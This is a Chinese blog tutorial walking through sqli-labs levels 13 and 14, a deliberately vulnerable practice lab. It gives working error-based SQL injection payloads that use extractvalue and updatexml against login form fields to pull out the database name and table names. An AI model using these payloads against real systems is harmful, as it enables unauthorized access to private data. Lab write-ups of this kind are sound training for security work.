前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >sql-labs-less13/less14|SQL注入

sql-labs-less13/less14|SQL注入

作者头像
TenG
发布2020-10-28 17:46:17
5400
发布2020-10-28 17:46:17
举报
文章被收录于专栏:网安菜鸟成长记

前言:

本章为此系列第13关和第14关,前面涉及到的语句这里不再讲解,如果有不明白的可以查看前面的文章都在这里,如果错误欢迎大佬指正!

正文:

less13:

这一关和12关区别不是很大,测试的时候要让12关的双引号换为单引号,同样要用右括号闭合,即这样uname=1’)#&passwd=1这里不在放图,这一关注入正确语句不会回显任何内容,所以还是需要盲注,使用updatexml()函数或者extractvalue()函数使用方法请参考第5关的文章sql-labs-less5/6|SQL注入,不在赘述,这里放一张爆数据库的图:

sql语句:

uname=1’) and extractvalue(1,concat(’~’,database()))#&passwd=1

不过需要注意的是,在爆多个字段时跟第五关有不一样了,即便使用分组函数一样不会显示字段,图示:

sql语句:

uname=1’) and extractvalue(1,concat(’~’,(select table_name from information_schema.tables where table_schema=‘security’)))#&passwd=1

报错内容为大致意思为不能显示多个字段,所以要加上limit语句一条一条查看,如图:

sql语句为:

uname=1’) and extractvalue(1,concat(’~’,(select table_name from information_schema.tables where table_schema=‘security’ limit 1,1)))#&passwd=1

flag为数据库的第一个表,想查看后面的表只需要limit第一个参数以此递增即可,使用updatexml函数除了语法跟这个有差别之外其他都是一样的。

less14:

这一关依然是报错注入,让13关的单引号换成双引号就行了,不过不用使用右括号闭合,下图:

成功爆出数据库名

sql语句:

uname=1" and updatexml(1,concat(’~’,database()),1)#&passwd=1

其他的都和上面一下,不再多说,感谢支持!

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020/09/25 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言:
  • 正文:
    • less13:
      • less14:
      相关产品与服务
      数据库
      云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档